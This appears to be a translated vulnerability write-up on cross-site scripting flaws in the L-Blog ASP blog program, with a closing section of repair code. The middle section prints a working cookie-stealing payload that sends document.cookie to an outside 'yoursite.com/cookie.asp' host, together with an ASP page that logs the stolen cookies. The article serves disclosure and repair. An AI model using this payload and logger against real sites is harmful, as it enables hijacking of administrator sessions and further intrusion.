Introduction and Repair of L-Blog Vulnerabilities (Illustrated) - Vulnerability Research

Source: Internet
Author: User

First of all, what is a blog? Many people do not know what a blog is, and might not understand this article without knowing, so I will spend some space on it.
Explanation:
Web publishing and posting ("post" as a noun refers to an entry) is a rapidly growing online activity, and there is even a proper noun for this kind of publishing: weblog, or blog. A blog is a web page usually made up of short, frequently updated posts arranged by year and date. Blogs vary widely in content and purpose: from hyperlinks to and comments on other websites, through news about companies, individuals and ideas, to diaries, photos, poetry, prose, and even science fiction. Many blogs publish an individual's own thoughts, while others are written by a group of people around a particular subject or area of common interest. Blogs seem to convey messages to the network in real time. Those who write these weblogs or blogs are called bloggers or blog writers. The idea of blogging on the web appeared in 1998, but it was not until 2000 that it really became popular. At first, bloggers recorded their daily views and opinions on a site and made them public for others to read and follow. With the rapid expansion of blogging, however, its purposes have moved far beyond the original one, and today the thousands of bloggers on the internet publish and post for very different reasons. Because communicating this way is simpler and easier than email and discussion groups, blogging has become an increasingly popular communication tool for families, companies, departments and teams, and it is also being used on corporate intranets.
The blog programs in use on the network today fall roughly into multi-user and single-user versions. There are many ASP blog programs and versions, so naturally there are all kinds of vulnerabilities. The mainstream ASP blog programs are currently the following:

1. L-Blog (written by Loveyuki, ASP + Access architecture); there are countless modified and restyled versions of this program
2. O-Blog (by Yechai, ASP + Access/SQL architecture, multi-user)
3. Misslong (multi-user version)
4. theanswer's Blog (a foreign open-source website project; careful and concise code)
5. SIC's blog (a modified version of L-Blog, more secure than the original)
6. Dlong (written by Pig fly; one of the earlier blog programs, development has stopped)

I will take the L-Blog program as the subject of analysis. Let's see how many problems L-Blog has.

I. L-Blog program vulnerabilities (cross-site scripting)
The more widely a program is used, the more vulnerabilities tend to be found in it, and L-Blog is no exception. The first thing to look at is the most basic one, cross-site scripting. In the member.asp, favorite.asp and bloglinks.asp pages, the author did nothing to prevent cross-site scripting and does not filter any sensitive characters at all, so cookies can be stolen and the blog can be defaced.
Take the "Personal homepage" field on the member.asp page as an example: entering specific malicious code there is enough to obtain the administrator's cookie or cause damage. For example, enter the following in the Personal homepage field: <script>alert("TEST. By. h4k_b4n");</script>



When the administrator or another user views the account data we set, the code is triggered, which completes the cross-site scripting attack.


Of the three pages, the most harmful is the add-link page, bloglinks.asp. Entering malicious code as the address of the link being applied for is enough to obtain the administrator's cookie directly: every link has to be approved by the administrator, so whenever the administrator logs in to the admincp.asp back-end management pages, the code runs and collects the cookie.
The code is as follows:
<script>document.location='http://yoursite.com/cookie.asp?'%2bdocument.cookie</script>

Cookie page code:
<%
' Append the query string of each request to Info.txt
testfile = Server.MapPath("Info.txt")
msg = Request.ServerVariables("QUERY_STRING")
Set fs = Server.CreateObject("Scripting.FileSystemObject")
' 8 = ForAppending, True = create the file if missing, 0 = ASCII
Set thisfile = fs.OpenTextFile(testfile, 8, True, 0)
thisfile.WriteLine(msg)
thisfile.Close
Set fs = Nothing
%>
With the code above, the administrator's cookie information is easily obtained and can be used for further intrusion.
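
The repair for the unfiltered "Personal homepage" and link-address fields described above, as an added example that is not L-Blog's own code: validate the value as a plain http/https URL on input and HTML-encode it on output. IsSafeUrl and RenderLink are hypothetical helper names, and the sample values are constructed.

```asp
<%
' Added example (hypothetical helper names; not part of L-Blog).
' Accept only plain http:// or https:// URLs for the homepage / link field.
Function IsSafeUrl(ByVal url)
    Dim re
    IsSafeUrl = False
    url = Trim(url & "")                       ' "& """ turns Null into an empty string
    If Len(url) = 0 Or Len(url) > 255 Then Exit Function
    Set re = New RegExp
    re.IgnoreCase = True
    ' Scheme allow-list, then only characters that cannot close an
    ' attribute value or open a tag (no quotes, spaces, < or >).
    re.Pattern = "^https?://[a-z0-9.-]+(:[0-9]{1,5})?(/[a-z0-9._~%/?#&=+-]*)?$"
    IsSafeUrl = re.Test(url)
    Set re = Nothing
End Function

' Render a stored value. Encoding is applied even to validated values,
' because rows saved before the fix were stored unfiltered.
Function RenderLink(ByVal url)
    If IsSafeUrl(url) Then
        RenderLink = "<a href=""" & Server.HTMLEncode(url) & """ rel=""nofollow"">" & _
                     Server.HTMLEncode(url) & "</a>"
    Else
        ' Anything else is shown as inert text, never as markup or a link.
        RenderLink = Server.HTMLEncode(url & "")
    End If
End Function

' Constructed sample values: one valid URL and the test string from the article.
Dim samples, i
samples = Array("http://example.com/blog/", _
                "<script>alert(""TEST"");</script>")
For i = 0 To UBound(samples)
    Response.Write RenderLink(samples(i)) & "<br>"
Next
%>
```

Setting the HttpOnly attribute on the login cookie additionally keeps document.cookie from exposing it to an injected script.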
